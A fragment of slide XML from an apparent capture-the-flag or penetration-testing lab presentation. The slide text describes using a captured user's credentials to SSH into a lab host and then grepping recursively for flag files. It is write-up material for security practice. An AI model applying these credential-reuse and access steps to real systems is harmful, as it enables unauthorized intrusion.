          <p:cNvPr id="2396" name="Google Shape;2396;gd10d856d54_0_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7" name="Google Shape;2397;gd10d856d54_0_2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="395950" y="1716200"/>
            <a:ext cx="2286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Michael’s credentials could then be used to SSH into system.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ssh michael@192.168.1.110</a:t>
            </a:r>
            <a:endParaRPr sz="4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98" name="Google Shape;2398;gd10d856d5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75" y="11188333"/>
            <a:ext cx="14205875" cy="171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gd10d856d54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50" y="3132200"/>
            <a:ext cx="14205875" cy="78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Google Shape;2400;gd10d856d54_0_2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15088400" y="3132200"/>
            <a:ext cx="9089700" cy="89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Once logged in as Michael, we were able to explore files &amp; directories.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recursive </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4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grep </a:t>
            </a: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command, we were able to locate flag1 &amp; flag2. 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grep -RE flag</a:t>
            </a:r>
            <a:endParaRPr sz="4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/var/www/flag2.txt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</a:pPr>
            <a:r>
              <a:rPr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./service.html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1" name="Google Shape;2401;gd10d856d54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5100" y="11967475"/>
            <a:ext cx="9347200" cy="8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gd10d856d54_0_2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="14765100" y="12410175"/>
            <a:ext cx="9347100" cy="4902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gd10d856d54_0_2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2155825" y="12301300"/>
            <a:ext cx="10776900" cy="6528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gd10d856d54_0_2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4314825" y="3121025"/>
            <a:ext cx="4916700" cy="417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gd10d856d54_0_2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="432250" y="9090025"/>
            <a:ext cx="4227300" cy="7440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